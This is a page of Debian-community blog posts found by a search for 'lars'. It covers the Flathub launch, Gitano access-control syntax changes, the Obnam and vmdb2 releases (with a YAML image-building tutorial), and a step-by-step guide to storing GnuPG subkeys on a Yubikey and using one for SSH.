Search Results: "lars"

29 July 2017

Robert McQueen: Welcome, Flathub!

Alex Larsson talks about Flathub at GUADEC 2017At the Gtk+ hackfest in London earlier this year, we stole an afternoon from the toolkit folks (sorry!) to talk about Flatpak, and how we could establish a critical mass behind the Flatpak format. Bringing Linux container and sandboxing technology together with ostree, we ve got a technology which solves real world distribution, technical and security problems which have arguably held back the Linux desktop space and frustrated ISVs and app developers for nearly 20 years. The problem we need to solve, like any ecosystem, is one of users and developers without stuff you can easily get in Flatpak format, there won t be many users, and without many users, we won t have a strong or compelling incentive for developers to take their precious time to understand a new format and a new technology. As Alex Larsson said in his GUADEC talk yesterday: Decentralisation is good. Flatpak is a tool that is totally agnostic of who is publishing the software and where it comes from. For software freedom, that s an important thing because we want technology to empower users, rather than tell them what they can or can t do. Unfortunately, decentralisation makes for a terrible user experience. At present, the Flatpak webpage has a manually curated list of links to 10s of places where you can find different Flatpaks and add them to your system. You can t easily search and browse to find apps to try out so it s clear that if the current situation remains we re not going to be able to get a critical mass of users and developers around Flatpak. Enter Flathub. The idea is that by creating an obvious center of gravity for the Flatpak community to contribute and build their apps, users will have one place to go and find the best that the Linux app ecosystem has to offer. We can take care of the boring stuff like running a build service and empower Linux application developers to choose how and when their app gets out to their users. After the London hackfest we sketched out a minimum viable system Github, Buildbot and a few workers and got it going over the past few months, culminating in a mini-fundraiser to pay for the hosting of a production-ready setup. Thanks to the 20 individuals who supported our fundraiser, to Mythic Beasts who provided a server along with management, monitoring and heaps of bandwidth, and to Codethink and Scaleway who provide our ARM and Intel workers respectively. We inherit our core principles from the Flatpak project we want the Flatpak technology to succeed at alleviating the issues faced by app developers in targeting a diverse set of Linux platforms. None of this stops you from building and hosting your own Flatpak repos and we look forward to this being a wide and open playing field. We care about the success of the Linux desktop as a platform, so we are open to proprietary applications through Flatpak s extra data feature where the client machine downloads 3rd party binaries. They are correctly labeled as such in the AppStream, so will only be shown if you or your OS has configured GNOME Software to show you apps with proprietary licenses, respecting the user s preference. The new infrastructure is up and running and I put it into production on Thursday. We rebuilt the whole repository on the new system over the course of the week, signing everything with our new 4096-bit key stored on a Yubikey smartcard USB key. We have 66 apps at the moment, although Alex is working on bringing in the GNOME apps at present we hope those will be joined soon by the KDE apps, and Endless is planning to move over as many of our 3rd party Flatpaks as possible over the coming months. So, thanks again to Alex and the whole Flatpak community, and the individuals and the companies who supported making this a reality. You can add the repository and get downloading right away. Welcome to Flathub! Go forth and flatten  Flathub logo

19 July 2017

Lars Wirzenius: Dropping Yakking from Planet Debian

A couple of people objected to having Yakking on Planet Debian, so I've removed it.

13 July 2017

Lars Wirzenius: Adding Yakking to Planet Debian

In a case of blatant self-promotion, I am going to add the Yakking RSS feed to the Planet Debian aggregation. (But really because I think some of the readership of Planet Debian may be interested in the content.) Yakking is a group blog by a few friends aimed at new free software contributors. From the front page description:
Welcome to Yakking. This is a blog for topics relevant to someone new to free software development. We assume you are already familiar with computers, and are curious about participating in the production of free software. You don't need to be a programmer: software development requires a wide variety of skills, and you can be a valued core contributor to a project without being a programmer.
If anyone objects, please let me know.

8 July 2017

Daniel Silverstone: Gitano - Approaching Release - Access Control Changes

As mentioned previously I am working toward getting Gitano into Stretch. A colleague and friend of mine (Richard Maw) did a large pile of work on Lace to support what we are calling sub-defines. These let us simplify Gitano's ACL files, particularly for individual projects. In this posting, I'd like to cover what has changed with the access control support in Gitano, so if you've never used it then some of this may make little sense. Later on, I'll be looking at some better user documentation in conjunction with another friend of mine (Lars Wirzenius) who has promised to help produce a basic administration manual before Stretch is totally frozen.

Sub-defines With a more modern lace (version 1.3 or later) there is a mechanism we are calling 'sub-defines'. Previously if you wanted to write a ruleset which said something like "Allow Steve to read my repository" you needed:
define is_steve user exact steve
allow "Steve can read my repo" is_steve op_read
And, as you'd expect, if you also wanted to grant read access to Jeff then you'd need yet set of defines:
define is_jeff user exact jeff
define is_steve user exact steve
define readers anyof is_jeff is_steve
allow "Steve and Jeff can read my repo" readers op_read
This, while flexible (and still entirely acceptable) is wordy for small rulesets and so we added sub-defines to create this syntax:
allow "Steve and Jeff can read my repo" op_read [anyof [user exact jeff] [user exact steve]]
Of course, this is generally neater for simpler rules, if you wanted to add another user then it might make sense to go for:
define readers anyof [user exact jeff] [user exact steve] [user exact susan]
allow "My friends can read my repo" op_read readers
The nice thing about this sub-define syntax is that it's basically usable anywhere you'd use the name of a previously defined thing, they're compiled in much the same way, and Richard worked hard to get good error messages out from them just in case.

No more auto_user_XXX and auto_group_YYY As a result of the above being implemented, the support Gitano previously grew for automatically defining users and groups has been removed. The approach we took was pretty inflexible and risked compilation errors if a user was deleted or renamed, and so the sub-define approach is much much better. If you currently use auto_user_XXX or auto_group_YYY in your rulesets then your upgrade path isn't bumpless but it should be fairly simple:
  1. Upgrade your version of lace to 1.3
  2. Replace any auto_user_FOO with [user exact FOO] and similarly for any auto_group_BAR to [group exact BAR].
  3. You can now upgrade Gitano safely.

No more 'basic' matches Since Gitano first gained support for ACLs using Lace, we had a mechanism called 'simple match' for basic inputs such as groups, usernames, repo names, ref names, etc. Simple matches looked like user FOO or group !BAR. The match syntax grew more and more arcane as we added Lua pattern support refs ~^refs/heads/$ user /. When we wanted to add proper PCRE regex support we added a syntax of the form: user pcre ^/.+?... where pcre could be any of: exact, prefix, suffix, pattern, or pcre. We had a complex set of rules for exactly what the sigils at the start of the match string might mean in what order, and it was getting unwieldy. To simplify matters, none of the "backward compatibility" remains in Gitano. You instead MUST use the what how with match form. To make this slightly more natural to use, we have added a bunch of aliases: is for exact, starts and startswith for prefix, and ends and endswith for suffix. In addition, kind of match can be prefixed with a ! to invert it, and for natural looking rules not is an alias for !is. This means that your rulesets MUST be updated to support the more explicit syntax before you update Gitano, or else nothing will compile. Fortunately this form has been supported for a long time, so you can do this in three steps.
  1. Update your gitano-admin.git global ruleset. For example, the old form of the defines used to contain define is_gitano_ref ref ~^refs/gitano/ which can trivially be replaced with: define is_gitano_ref ref prefix refs/gitano/
  2. Update any non-zero rulesets your projects might have.
  3. You can now safely update Gitano
If you want a reference for making those changes, you can look at the Gitano skeleton ruleset which can be found at https://git.gitano.org.uk/gitano.git/tree/skel/gitano-admin/rules/ or in /usr/share/gitano if Gitano is installed on your local system. Next time, I'll likely talk about the deprecated commands which are no longer in Gitano, and how you'll need to adjust your automation to use the new commands.

2 July 2017

Bits from Debian: New Debian Developers and Maintainers (May and June 2017)

The following contributors got their Debian Developer accounts in the last two months: The following contributors were added as Debian Maintainers in the last two months: Congratulations!

25 June 2017

Lars Wirzenius: Obnam 1.22 released (backup application)

I've just released version 1.22 of Obnam, my backup application. It is the first release for this year. Packages are available on code.liw.fi/debian and in Debian unstable, and source is in git. A summary of the user-visible changes is below. For those interested in living dangerously and accidentally on purpose deleting all their data, the link below shows that status and roadmap for FORMAT GREEN ALBATROSS. http://distix.obnam.org/obnam-dev/182bd772889544d5867e1a0ce4e76652.html Version 1.22, released 2017-06-25

4 June 2017

Lars Wirzenius: Vmdb2 first alpha release: Debian disk image creation tool

tl;dr: Get vmdebootstrap replacement from http://git.liw.fi/vmdb2 and run it from the source tree. Tell me if something doesn't work. Send patches. Many years ago I wrote vmdebootstrap, a tool for installing Debian on a disk image for virtual machines. I had a clear personal need: I was setting up a CI system and it needed six workers: one each for Debian oldstable, stable, and unstable, on two architectures (i386, amd64). Installing Debian six times in the same way is a lot of work, so I figured how difficult can it be to automate it. Turns out that not difficult at all, except to install a bootloader. (Don't ask me why I didn't use any of the other tools for this. It was long ago, and while some of the tools that now exist probably did exist then, I like writing code and learning things while doing it.) After a while I was happy with what the program did, but didn't want to upload it to Debian, and didn't want to add the kinds of things other people wanted, so I turned vmdebootstrap over to Neil Williams, who added a ton of new features. Unfortunately, it turned out that my initial architecture was not scaleable, and also the code I wrote wasn't very good, and there weren't any tests. Neil did heroic work forcing my crappy software into doing things I never envisioned. Last year he needed a break and asked me to take vmdebootstrap back. I did, and have been hiding from the public eye ever since, since I was so ashamed of the code. (I created a new identity and pretended to be an international assassin and backup specialist, travelling the world forcing people to have at least one tested backup of their system. If you've noticed reports in the press about people reporting near-death experiences while holding a shiny new USB drive, that would've been my fault.) Pop quiz: if you have a program with ten boolean options ("do this, except if that option is given, do the other thing"), how many black box tests do you need to test all the functionality? If one run of the program takes half an hour, how long will a full test suite run? I did some hard thinking about vmdebootstrap, and came to the sad conclusion that it had reached the end of its useful life as a living software project. There was no reasonable way to add most of the additional functionality people were asking for, and even maintaining the current code was too tedious a task to consider seriously. It was time to make a clean break of the past and start over, without caring about backwards compatibility. After all, the old code wasn't going anywhere so anyone who needed it could still use it. There was no need to burden a new program with my past mistakes. All new mistakes were called for. At the Cambridge mini-Debconf of November, 2016, I gave a short presentation of what I was going to do. I also posted about my plans to the debian-cloud list. In short, I would write a new, more flexible and cleaner replacement to be called vmdb2. For various personal reasons, I've not been able to spend as much time on vmdb2 as I'd like to, but I've now reached the point where I'd like to announce the first alpha version publically. The source code is hosted here: http://git.liw.fi/vmdb2 . There are .deb packages at my personal public APT repo (http://liw.fi/code/), but vmdb2 is easy enough to run directly from a git checkout:
sudo ./vmdb2 foo.vmdb --output foo.img
There's no need to install it to try it. What works: What doesn't work: I'm not opposed to adding support for those, but they're not directly interesting to me. For example, I only have amd64 machines. The best way to get support for additional features is to tell me how, preferably in the form of patches. (If I have to read tons of docs, or other people's code, and then write code and iterate while other people tell me it doesn't work, it's probably not happening.) Why would you be interested in vmdb2? There's a lot of other tools to do what it does, so perhaps you shouldn't care. That's fine. I like writing tools for myself. But if this kind of tool is of interest to you, please do have a look. A short tutorial: vmdb2 wants you to give it a "specification file" (conventionally suffixed .vmdb, because someone stole the .spec suffix, but vmdb2 doesn't care about the name). Below is an example. vmdb2 image specification files are in YAML, since I like YAML, and specify a sequence of steps to take to build the image. Each step is a tiny piece of self-contained functionality provided by a plugin.
steps:
  - mkimg: "  output  "
    size: 4G
  - mklabel: msdos
    device: "  output  "
  - mkpart: primary
    device: "  output  "
    start: 0%
    end: 100%
    part-tag: root-part
The above create an image (name is specified with the --output option), which is four gigabytes in size, and create a partitition table and a single partition that fills the whole disk. The "tag" is given so that later steps can easily refer to the partition. If you prefer another way to partition the disk, you can achieve that by adding more "mkpart" steps. For example, for UEFI you'll want to have an EFI partition.
  - mkfs: ext4
    partition: root-part
  - mount: root-part
    fs-tag: root-fs
The above formats the partition with the ext4 filesystem, and then mounts it. The mount point will be a temporary directory created by vmdb2, and a tag is again given to the mount point so it can be referred to.
  - unpack-rootfs: root-fs
The above unpacks a tar archive to put content into the filesystem, if the tar archive exists. The tar archive is specified with the --rootfs-tarball command line option.
  - debootstrap: stretch
    mirror: http://http.debian.net/debian
    target: root-fs
    unless: rootfs_unpacked
  - apt: linux-image-amd64
    fs-tag: root-fs
    unless: rootfs_unpacked
  - cache-rootfs: root-fs
    unless: rootfs_unpacked
The above will run debootstrap and install a kernel into the filesystem, but skip doing that if the rootfs tarball was used. Also, the tarball is created if it didn't exist. This way the tarball is used by all but the first run, which saves a bit of time. On my laptop and with a local mirror, debootstrap and kernel installation takes on the order of nine minutes (500 to 600 seconds), whereas unpacking the tar archive is a bit faster (takes around 30 seconds). When iterating over things other than debootstrap, this speeds things up something wonderful, and seems worth the complexity. The "unless:" mechanism is generic. All the steps share some state, and the unpack-rootfs step sets the "rootfs_unpacked" flag in the shared state. The "unless:" field tells vmdb2 to check for the flag and if it is not set, or if it is set to false ("unless it is set to true"), vmdb2 will execute the step. vmdb2 may get more such flags in the future, if there's need.
  - chroot: root-fs
    shell:  
      sed -i '/^root:[^:]*:/s//root::/' /etc/passwd
      echo pc-vmdb2 > /etc/hostname
The above executes a couple of shell commands in a chroot of the root filesystem we've just created. In this case they remove a login password from root, and set the hostname. This is a replacement of the vmdebootstrap "customize" script, but it can be inserted anywhere into the sequence of steps. There's boot chroot and non-chroot variants of the step. This is a good point to mention that writing customize scripts gets quite repetitive and tedious after a while, so vmdb2 has a plugin to run Ansible instead. You can customize your image with that instead, while the image is being built and not have to wait until you boot the image and running Ansible over ssh.
  - grub: bios
    root-fs: root-fs
    root-part: root-part
    device: "  output  "
    console: serial
Finally, install a boot loader, grub. This shows the BIOS variant, UEFI is also supported. This also configures grub and the kernel to use a serial console. There's a "yarn" (test suite) to build and smoke test an image with vmdb2 to make sure at least the basic functionality works. The smoke test boots the image under Qemu, logs in as root, and tells the VM to power off. Very, very basic, but has already found actual bugs in vmdb2. The smoke test needs the serial console to work. As with vmdebootstrap originally, I don't particularly want to maintain the package in Debian. I've added Debian packaging (so that I can install it on my own machines), but I already have enough packages to maintain, so I'm hoping someone else will volunteer to take on the Debian maintainership and bug handling duties. If you would like vmdb2 to do more things to suit you better, I'm happy to explain how to write plugins to provide more types of steps. If you are currently using vmdebootstrap, either directly or as part of another tool, I encourage you to have a look at vmdb2. In the long term, I would like to retire vmdebootstrap entirely, once vmdb2 can do everything vmdebootstrap can do, and few people use vmdebootstrap. This may take a while. In any case, whether you want a new image building tool or not, happy hacking.

31 May 2017

Lars Wirzenius: Using a Yubikey 4 for ensafening one's encryption

Introduction I've written before about using a U2F key with PAM. This post continues the theme and explains how to use a smartcard with GnuPG for storing OpenPGP private keys. Specifically, a Yubikey 4 card, because that's what I have, but any good GnuPG compatible card should work. The Yubikey is both a GnuPG compatible smart card, and a U2F card. The Yubikey 4 can handle keys up to 4096 bits. Older Yubikeys can only handle keys up to 2095 bits. The reason to do this is to make it harder for an attacker to steal your encryption keys. I will assume you don't already have an OpenPGP key, or are willing to generate a new one. I will also assume you run Debian stretch; some of the desktop environment setup details may differ between Debian versions or between Linux distributions. You will need: Terminology Some terminology: Outline The process outline is:
  1. Create a new, signing-only master key with GnuPG.
  2. Create three "subkeys", one each for encryption, signing, and authentication. These subkeys are what everyone else uses.
  3. Export copies of the master key pair and the subkey pairs and put them in a safe place.
  4. Put the subkeys on the Yubikey.
  5. GnuPG will automatically use the keys from the card. You have to have the card plugged into a USB port for things to work. If someone steals your laptop, they won't get the private subkeys. Even if they steal your Yubikey, they won't get them (the smartcard is physically designed to prevent that), and can't even use them (because there's PIN codes or passphrases and getting them wrong several times locks up the smartcard).
  6. Use gpg-agent as your SSH agent, and the authentication-only subkey on the Yubikey is used as your ssh key.
Configure GnuPG The process in more detail: Create new keys
$ gpg --full-generate-key
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
Your selection? 4
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
= key expires in n days
w = key expires in n weeks
m = key expires in n months
y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:43:54 PM EEST
Is this correct? (y/N) y

GnuPG needs to construct a user ID to identify your key.

Real name: Lars Wirzenius
Email address: liw@liw.fi
Comment: test key
You selected this USER-ID:
"Lars Wirzenius (test key) <liw@liw.fi>>"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: key 25FB738D6EE435F7 marked as ultimately trusted
gpg: directory '/home/liw/.gnupg/openpgp-revocs.d' created
gpg: revocation certificate stored as '/home/liw/.gnupg/openpgp-revocs.d/A734C10BF2DF39D19DC0F6C025FB738D6EE435F7.rev'
public and secret key created and signed.

Note that this key cannot be used for encryption. You may want to use
the command "--edit-key" to generate a subkey for this purpose.
pub rsa4096 2017-05-29 [SC] [expires: 2018-05-29]
A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
uid Lars Wirzenius (test key) <liw@liw.fi>
  • Note that I set a 1-year expiration for they key. The expiration can be extended at any time (if you have the master secret key), but unless you do, the key won't accidentally live longer than the chosen time.
  • Review the key:
$ gpg --list-secret-keys
/home/liw/.gnupg/pubring.kbx
----------------------------
sec rsa4096 2017-05-29 [SC] [expires: 2018-05-29]
A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
uid [ultimate] Lars Wirzenius (test key) <liw@liw.fi>
  • You now have the signing-only master key. You should now create three subkeys (keyid is the key identifier shown in the key listing, A734C10BF2DF39D19DC0F6C025FB738D6EE435F7 above). Use the --expert option to be able to add an authentication-only subkey.
$ gpg --edit-key --expert A734C10BF2DF39D19DC0F6C025FB738D6EE435F7z
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> addkey
Please select what kind of key you want:
(3) DSA (sign only)
(4) RSA (sign only)
(5) Elgamal (encrypt only)
(6) RSA (encrypt only)
(7) DSA (set your own capabilities)
(8) RSA (set your own capabilities)
(10) ECC (sign only)
(11) ECC (set your own capabilities)
(12) ECC (encrypt only)
(13) Existing key
Your selection? 4
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
= key expires in n days
w = key expires in n weeks
m = key expires in n months
y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:44:52 PM EEST
Is this correct? (y/N) y
Really create? (y/N) y
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> addkey
Please select what kind of key you want:
(3) DSA (sign only)
(4) RSA (sign only
(5) Elgamal (encrypt only)
(6) RSA (encrypt only)
(7) DSA (set your own capabilities)
(8) RSA (set your own capabilities)
(10) ECC (sign only)
(11) ECC (set your own capabilities)
(12) ECC (encrypt only)
(13) Existing key
Your selection? 6
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid
0 = key does not expire
= key expires in n days
w = key expires in n weeks
m = key expires in n months
y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:45:22 PM EEST
Is this correct? (y/N) y
Really create? (y/N) y
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> addkey
Please select what kind of key you want:
(3) DSA (sign only)
(4) RSA (sign only)
(5) Elgamal (encrypt only)
(6) RSA (encrypt only)
(7) DSA (set your own capabilities)
(8) RSA (set your own capabilities)
(10) ECC (sign only)
(11) ECC (set your own capabilities)
(12) ECC (encrypt only)
(13) Existing key
Your selection? 8

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Sign Encrypt

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? a

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Sign Encrypt Authenticate

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? s

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Encrypt Authenticate

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? e

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Authenticate

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? q
RSA keys may be btween 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
= key expires in n days
w = key expires in n weeks
m = key expires in n months
y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:45:56 PM EEST
Is this correct? (y/N) y
Really create? (y/N) y
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> save
Export secret keys to files, make a backup
  • You now have a master key and three subkeys. They are hidden in the ~/.gnupg directory. It is time to "export" the secret keys out from there.
$ gpg --export-secret-key --armor keyid > master.key
$ gpg --export-secret-subkeys --armor keyid > subkeys.key
  • You should keep these files safe. You don't want to lose them, and you don't want anyone else to get access to them. I recommend you format two USB memory sticks, format them using full-disk encryption, and copy the exported files to both of them. Then keep them somewhere safe. There's ways of making this part more sophisticated, but that's for another time.
  • The next step involves some hoop-jumping. What we want is to have the master secret key NOT on you machine, so we tell GnuPG to remove it. We exported it above, so we won't lose it. However, deleting the master secret key also removes the secret subkeys. But we can import those without importing the master secret key.
$ gpg --delete-secret-key keyid
$ gpg --import subkeys.key
  • Now verify that you have the secret subkeys, but not the master key. There should be one line starting with sec# (note the hash mark, which indicates the key isn't available), and three lines starting with ssb (no hash mark).
$ gpg -K
/home/liw/.gnupg/pubring.kbx
----------------------------
sec# rsa4096 2017-05-29 [SC] [expires: 2018-05-29]
A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
uid [ultimate] Lars Wirzenius (test key) <liw@liw.fi>
ssb rsa4096 2017-05-29 [S] [expires: 2018-05-29]
ssb rsa4096 2017-05-29 [E] [expires: 2018-05-29]
ssb rsa4096 2017-05-29 [A] [expires: 2018-05-29]
Install subkeys on a Yubikey
  • Now insert the Yubikey in a USB slot. We can start transferring the secret subkeys to the Yubikey. If you want, you can set your name and other information, and change PIN codes. There's several types of PIN codes: normal use, unblocking a locked card, and a third PIN code for admin operations. Changing the PIN codes is a good idea, otherwise everyone will just try the default of 123456 (admin 12345678). However, I'm skipping that in the interest of brevity.
$ gpg -card-edit
...
  • Actually move the subkeys to the card. Note that this does a move, not a copy, and the subkeys will be removed from your ~/.gnupg (check with gpg -K).
$ gpg --edit-key liw
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 1

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb* rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> keytocard
Please select where to store the key:
(1) Signature key
(3) Authentication key
Your selection? 1

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb* rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 1

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 2

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb* rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> keytocard
Please select where to store the key:
(2) Encryption key
Your selection? 2

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb* rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 2

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 3

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb* rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> keytocard
Please select where to store the key:
(3) Authentication key
Your selection? 3

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb* rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> save
  • If you want to use several Yubikeys, or have a spare one just in case, repeat the previous four steps (starting from importing subkeys back into ~/.gnupg).
  • You're now done, as far GnuPG use is concerned. Any time you need to sign, encrypt, or decrypt something, GnuPG will look for your subkeys on the Yubikey, and will tell you to insert it in a USB port if it can't find the key.
Use subkey on Yubikey as your SSH key
  • To actually use the authentication-only subkey on the Yubikey for ssh, you need to configure your system to use gpg-agent as the SSH agent. Add the following line to .gnupg/gpg-agent.conf:
     enable-ssh-support
    
  • On a Debian stretch system with GNOME, edit /etc/xdg/autostart/gnome-keyring-ssh.desktop to have the following line, to prevent the GNOME ssh agent from starting up:
     Hidden=true
    
  • Edit /etc/X11/Xsession.options and remove or comment out the line that says use-ssh-agent. This stops a system-started ssh-agent from being started when the desktop start.
  • Create the file ~/.config/autostart/gpg-agent.desktop with the following content:
     [Desktop Entry]
     Type=Application
     Name=gpg-agent
     Comment=gpg-agent
     Exec=/usr/bin/gpg-agent --daemon
     OnlyShowIn=GNOME;Unity;MATE;
     X-GNOME-Autostart-Phase=PreDisplayServer
     X-GNOME-AutoRestart=false
     X-GNOME-Autostart-Notify=true
     X-GNOME-Bugzilla-Bugzilla=GNOME
     X-GNOME-Bugzilla-Product=gnome-keyring
     X-GNOME-Bugzilla-Component=general
     X-GNOME-Bugzilla-Version=3.20.0
    
  • To test, log out, and back in again, run the following in a terminal:
$ ssh-add -l
The output should contain a line that looks like this:
    4096 SHA256:PDCzyQPpd9tiWsELM8LwaLBsMDMm42J8/eEfezNgnVc cardno:000604626953 (RSA)
  • You need to export the authentication-only subkey in the SSH key format. You need this for adding to .ssh/authorized_keys, if nothing else.
$ gpg --export-ssh-key keyid > ssh.pub
  • Happy hacking.
